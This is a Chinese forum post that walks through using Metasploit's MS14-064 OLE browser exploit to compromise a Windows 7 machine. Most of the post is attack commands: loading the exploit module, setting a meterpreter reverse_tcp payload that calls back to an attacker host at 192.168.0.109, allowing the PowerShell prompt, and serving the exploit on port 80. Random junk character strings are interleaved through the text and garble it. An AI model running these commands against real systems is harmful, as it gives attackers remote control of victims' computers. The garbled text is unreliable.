找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1422|回复: 0
打印 上一主题 下一主题

MS14-064 漏洞测试入侵win7

[复制链接]
跳转到指定楼层
楼主
发表于 2018-10-20 20:20:35 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

' v; f8 _* n# E+ \( f8 I$ ? 我发现msf下的exp只能针对带有powershell的机器进行攻击,我们用如下方法来搞演示# A0 E2 r8 Q3 E$ Q U7 [$ \

* ]( s. X8 a2 t. f* ~

) Y$ N0 r! x: p/ s7 ~1 g; u% N$ A# \ 开启msf执行命令use exploits/windows/browser/ms14_064_ole_code_execution如图: 5 `' G6 x8 H0 D' E

# Q! s( H4 E/ a8 L V" a

$ j* l8 G1 i+ v- J 然后执行命令 set PAYLOAD windows/meterpreter/reverse_tcp + H" ^4 A5 ]0 e0 r" L

3 E/ C6 q% z3 v! _1 z

) f$ ~' A' H! F# L             set AllowPowershellPrompt true - ~) j7 F% j9 H! ^( S

i: H9 U' r4 e( r7 i; o

) X. y8 C) i) y6 L, F* A             Set LHOST 192.168.0.109* z2 N0 _: I8 H4 p7 l$ `3 Q

. }0 ^7 J3 v d, q

/ \9 Q# Z/ l: |             set SRVHOST 192.168.0.109/ @6 I. ?% V$ ?- o5 ?4 ]- Z, _

) [! u. a' }5 N0 O6 j0 u

1 o+ s0 @' }, O             Set uripath share, E0 B; K+ J' O9 ?5 `7 l, Z

2 B9 J+ K' m9 H

: V6 n o- U; {8 u( j$ O9 C             Set srvport 80 % a) k, ]/ q( O

* r% T2 L9 N( x% i) r3 {" H

& ^7 L5 r1 A5 ?- c! O   5 F+ k6 v" `8 L4 H% {( [

' E4 n9 {/ s3 B" e6 q

6 X% Q6 C7 |& x8 X' c   - {, R3 m' p2 }: }

! }4 `! T X7 v. a. [9 M7 V

$ W1 g5 Z+ P4 s1 Z* e% P9 b  + O) T( S2 \2 v

/ @% d) f; ]) m! c" `$ B

- T# G, |4 I+ K  5 N9 k. Q" a1 [" v7 x

( u4 J* H' t5 w

/ M. q1 U& P9 d& J" O- W, t9 ~- s) E  / X! W) N0 K9 E# B6 V* H

4 E' z+ L% q% O6 ^

9 E& ~7 b; }8 o3 v 下面我们来访问本地地址如图:7 z, x' o& b0 ^: y: O3 f; V8 n! b/ o

+ G/ r# _9 G9 M( y2 L8 u

) Z; e5 _0 O+ [, O. Q% F H" U  % E# u+ c. S3 M" ~& m8 X

. P# F( s3 I. S& o d( z

. ]2 W4 M4 e" i- E' W) s  / n* J; k! C2 e

" d8 j2 T- Q0 R* n3 i, U) R

. m/ E3 X) L3 t. T - }% i9 o3 H& V+ G3 u/ J8 P. j

回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表